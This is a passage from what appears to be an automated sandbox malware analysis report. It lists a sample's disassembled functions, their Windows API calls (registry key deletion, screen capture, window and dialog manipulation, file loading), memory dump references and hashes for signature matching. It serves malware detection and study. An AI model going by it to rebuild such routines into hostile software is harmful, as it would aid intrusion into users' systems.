                                                                                • Instruction Fuzzy Hash: 02516EB0501608BFDB619F64C948ABB7BFEFF08764F008419F98596310DB74E954DB60
                                                                                Function 0066856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00668592
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685A2
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685AD
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685BA
                                                                                • GlobalLock.KERNEL32(00000000), ref: 006685C8
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685D7
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 006685E0
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685E7
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006685F8
                                                                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0066FC38,?), ref: 00668611
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00668621
                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00668641
                                                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00668671
                                                                                • DeleteObject.GDI32(?), ref: 00668699
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006686AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: 84ace92714139ebbb2d2668daad19d16867ea6c526a8162ac60c9c438deefe0d
                                                                                • Instruction ID: 97f7c04cb81f6411bc78b12de212852d7ba3e1668879a4c28493aeb7c1e56ff9
                                                                                • Opcode Fuzzy Hash: 84ace92714139ebbb2d2668daad19d16867ea6c526a8162ac60c9c438deefe0d
                                                                                • Instruction Fuzzy Hash: A3411975600604BFDB119FA5DC48EAA7BBEEF89B21F104159F946E7260DB709E01CB60
                                                                                Function 006414BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000000), ref: 00641502
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0064150B
                                                                                • VariantClear.OLEAUT32(?), ref: 00641517
                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006415FB
                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00641657
                                                                                • VariantInit.OLEAUT32(?), ref: 00641708
                                                                                • SysFreeString.OLEAUT32(?), ref: 0064178C
                                                                                • VariantClear.OLEAUT32(?), ref: 006417D8
                                                                                • VariantClear.OLEAUT32(?), ref: 006417E7
                                                                                • VariantInit.OLEAUT32(00000000), ref: 00641823
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 1234038744-3931177956
                                                                                • Opcode ID: 1d37bda74e5566d68e3a9e47369c5933b3abaace51c759256df02d1b5bf82c10
                                                                                • Instruction ID: 8ca4107cefe6b017d48ee7f1cc2250ec657f0f61f0b064d7aa9e9d267ef85d8b
                                                                                • Opcode Fuzzy Hash: 1d37bda74e5566d68e3a9e47369c5933b3abaace51c759256df02d1b5bf82c10
                                                                                • Instruction Fuzzy Hash: 21D1E5B1600516DBDB18EF65D889BBDBBB6BF86700F148056F446AF680DB30EC82DB51
                                                                                Function 0065B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                  • Part of subcall function 0065C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0065B6AE,?,?), ref: 0065C9B5
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065C9F1
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA68
                                                                                  • Part of subcall function 0065C998: _wcslen.LIBCMT ref: 0065CA9E
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065B6F4
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0065B772
                                                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 0065B80A
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0065B87E
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0065B89C
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0065B8F2
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0065B904
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0065B922
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0065B983
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0065B994
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 146587525-4033151799
                                                                                • Opcode ID: cd9f01e1d4a0f7dcde29da5ab429536be5a5343bafa2aed195209cd6cd2cf694
                                                                                • Instruction ID: 87462284557be69eb017b1d384b24d551cafcf3acc45d898fbb8772dea2200e2
                                                                                • Opcode Fuzzy Hash: cd9f01e1d4a0f7dcde29da5ab429536be5a5343bafa2aed195209cd6cd2cf694
                                                                                • Instruction Fuzzy Hash: 9EC16E30204202AFD720DF18C495F6ABBE6BF85319F14955DF8968B3A2C771ED49CB91
                                                                                Function 0065255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 006525D8
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 006525E8
                                                                                • CreateCompatibleDC.GDI32(?), ref: 006525F4
                                                                                • SelectObject.GDI32(00000000,?), ref: 00652601
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0065266D
                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 006526AC
                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 006526D0
                                                                                • SelectObject.GDI32(?,?), ref: 006526D8
                                                                                • DeleteObject.GDI32(?), ref: 006526E1
                                                                                • DeleteDC.GDI32(?), ref: 006526E8
                                                                                • ReleaseDC.USER32(00000000,?), ref: 006526F3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: a652e560098a6fe9d3f48a7895e45e56f1e693ae5b3b1ffe5f6266801375ce8b
                                                                                • Instruction ID: 9662a6b8ba72b60abccc21088b2b0d60fc0ef2e980b1c1a8010d752165eca047
                                                                                • Opcode Fuzzy Hash: a652e560098a6fe9d3f48a7895e45e56f1e693ae5b3b1ffe5f6266801375ce8b
                                                                                • Instruction Fuzzy Hash: 2B61F475D0061AEFCF04CFA4D894AAEBBF6FF48310F208529E955A7250D771A941CF94
                                                                                Function 0060DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 0060DAA1
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D659
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D66B
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D67D
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D68F
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6A1
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6B3
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6C5
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6D7
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6E9
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D6FB
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D70D
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D71F
                                                                                  • Part of subcall function 0060D63C: _free.LIBCMT ref: 0060D731
                                                                                • _free.LIBCMT ref: 0060DA96
                                                                                  • Part of subcall function 006029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000), ref: 006029DE
                                                                                  • Part of subcall function 006029C8: GetLastError.KERNEL32(00000000,?,0060D7D1,00000000,00000000,00000000,00000000,?,0060D7F8,00000000,00000007,00000000,?,0060DBF5,00000000,00000000), ref: 006029F0
                                                                                • _free.LIBCMT ref: 0060DAB8
                                                                                • _free.LIBCMT ref: 0060DACD
                                                                                • _free.LIBCMT ref: 0060DAD8
                                                                                • _free.LIBCMT ref: 0060DAFA
                                                                                • _free.LIBCMT ref: 0060DB0D
                                                                                • _free.LIBCMT ref: 0060DB1B
                                                                                • _free.LIBCMT ref: 0060DB26
                                                                                • _free.LIBCMT ref: 0060DB5E
                                                                                • _free.LIBCMT ref: 0060DB65
                                                                                • _free.LIBCMT ref: 0060DB82
                                                                                • _free.LIBCMT ref: 0060DB9A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: aaa64df1ad360d0d096e88a3f1a4fbe14835bb136f56c49d9f1fbf95a121caad
                                                                                • Instruction ID: 5e9f70f856a4960c56b77a1b02231d038bc5addbc136e087ce959cd0b5137088
                                                                                • Opcode Fuzzy Hash: aaa64df1ad360d0d096e88a3f1a4fbe14835bb136f56c49d9f1fbf95a121caad
                                                                                • Instruction Fuzzy Hash: BD317C716842069FEB69AAB9E845B9B77EAFF00710F204A1DE449D72D1DB30EC40C724
                                                                                Function 0063365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0063369C
                                                                                • _wcslen.LIBCMT ref: 006336A7
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00633797
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0063380C
                                                                                • GetDlgCtrlID.USER32(?), ref: 0063385D
                                                                                • GetWindowRect.USER32(?,?), ref: 00633882
                                                                                • GetParent.USER32(?), ref: 006338A0
                                                                                • ScreenToClient.USER32(00000000), ref: 006338A7
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00633921
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0063395D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                • String ID: %s%u
                                                                                • API String ID: 4010501982-679674701
                                                                                • Opcode ID: 80008d215d2383fb10d2a609a4ac87a2cab88421131c42117caca905ff248a44
                                                                                • Instruction ID: 01103dd22312446eaf7fade9c150c69ad77354cdeaec62f9831198b677e06732
                                                                                • Opcode Fuzzy Hash: 80008d215d2383fb10d2a609a4ac87a2cab88421131c42117caca905ff248a44
                                                                                • Instruction Fuzzy Hash: D6919171204616EFD719DF24C885BEAF7AAFF44350F004629FA99C6290EB70EA45CBD1
                                                                                Function 00634954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00634994
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 006349DA
                                                                                • _wcslen.LIBCMT ref: 006349EB
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 006349F7
                                                                                • _wcsstr.LIBVCRUNTIME ref: 00634A2C
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00634A64
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00634A9D
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00634AE6
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00634B20
                                                                                • GetWindowRect.USER32(?,?), ref: 00634B8B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                • String ID: ThumbnailClass
                                                                                • API String ID: 1311036022-1241985126
                                                                                • Opcode ID: 8e9b11e494c033497b9640c06a3387b912d21c6cab9e8346e96d938d5c7a2270
                                                                                • Instruction ID: 19d455fee6c709d602f0f80563e8ec6a33eb4765cd08333aed2ec04029af0cb8
                                                                                • Opcode Fuzzy Hash: 8e9b11e494c033497b9640c06a3387b912d21c6cab9e8346e96d938d5c7a2270
                                                                                • Instruction Fuzzy Hash: 8491AE711042069BDB04CF14C985BAAFBEAFF84314F04846AFD869A296DF34ED45CBA1
                                                                                Function 00668D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 005E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005E9BB2
                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00668D5A
                                                                                • GetFocus.USER32 ref: 00668D6A
                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00668D75
                                                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00668E1D
                                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00668ECF
                                                                                • GetMenuItemCount.USER32(?), ref: 00668EEC
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00668EFC
                                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00668F2E
                                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00668F70
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00668FA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                • String ID: 0
                                                                                • API String ID: 1026556194-4108050209
                                                                                • Opcode ID: b7a62bef0d4ea5b3004d35c22af330dec226314555e20c01a0d9942ad27c096d
                                                                                • Instruction ID: 54c6cd0170db8b251b28477b438c278d34397e09507125ff083d3c8a4a04b9bd
                                                                                • Opcode Fuzzy Hash: b7a62bef0d4ea5b3004d35c22af330dec226314555e20c01a0d9942ad27c096d
                                                                                • Instruction Fuzzy Hash: 94819F71508341AFDB10DF24D884AAB7BEBFF89354F140A1EF98597291DB71E901CBA2
                                                                                Function 0063DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0063DC20
                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0063DC46
                                                                                • _wcslen.LIBCMT ref: 0063DC50
                                                                                • _wcsstr.LIBVCRUNTIME ref: 0063DCA0
                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0063DCBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                • API String ID: 1939486746-1459072770
                                                                                • Opcode ID: 4bfef0b9fe71b9782ee7ed925d7105bbd9958982b807045e17137018d7599296
                                                                                • Instruction ID: 064142613ef7e04d342205c53b66bedc5510440d8022095e48f8cfd6b556bfb3
                                                                                • Opcode Fuzzy Hash: 4bfef0b9fe71b9782ee7ed925d7105bbd9958982b807045e17137018d7599296
                                                                                • Instruction Fuzzy Hash: 8A4118329407067ADB14AB75DC4BEFF7B6DFF82760F10006AFA00A6182EB75990197B4
                                                                                Function 0065CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0065CC64
                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0065CC8D
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0065CD48
                                                                                  • Part of subcall function 0065CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0065CCAA
                                                                                  • Part of subcall function 0065CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0065CCBD
                                                                                  • Part of subcall function 0065CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0065CCCF
                                                                                  • Part of subcall function 0065CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0065CD05
                                                                                  • Part of subcall function 0065CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0065CD28
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0065CCF3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2734957052-4033151799
                                                                                • Opcode ID: be70dd3e98781277891bf0b8bf08dbfe1106c7aa1aa4d4adc42e75c086b44cc4
                                                                                • Instruction ID: dfd478e9582f15ca6f1693502117e16ebc136d62a2a166c5a68ee0b878cc026d
                                                                                • Opcode Fuzzy Hash: be70dd3e98781277891bf0b8bf08dbfe1106c7aa1aa4d4adc42e75c086b44cc4
                                                                                • Instruction Fuzzy Hash: 3231A171901229BFDB209B94DC88EFFBB7EEF01761F000165F945E2200D7B08A49DAA0
                                                                                Function 0063E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • timeGetTime.WINMM ref: 0063E6B4
                                                                                  • Part of subcall function 005EE551: timeGetTime.WINMM(?,?,0063E6D4), ref: 005EE555
                                                                                • Sleep.KERNEL32(0000000A), ref: 0063E6E1
                                                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0063E705
                                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0063E727
                                                                                • SetActiveWindow.USER32 ref: 0063E746
                                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0063E754
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0063E773
                                                                                • Sleep.KERNEL32(000000FA), ref: 0063E77E
                                                                                • IsWindow.USER32 ref: 0063E78A
                                                                                • EndDialog.USER32(00000000), ref: 0063E79B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                • String ID: BUTTON
                                                                                • API String ID: 1194449130-3405671355
                                                                                • Opcode ID: 97e801ec6818b365dcc25f22faf7a2578359f7b0b37dd5be96c38cc3226a0a70
                                                                                • Instruction ID: 9aa5ba4d69829e614cace606a023c2c634144f903b6567ad1014d7e6fa1081ff
                                                                                • Opcode Fuzzy Hash: 97e801ec6818b365dcc25f22faf7a2578359f7b0b37dd5be96c38cc3226a0a70
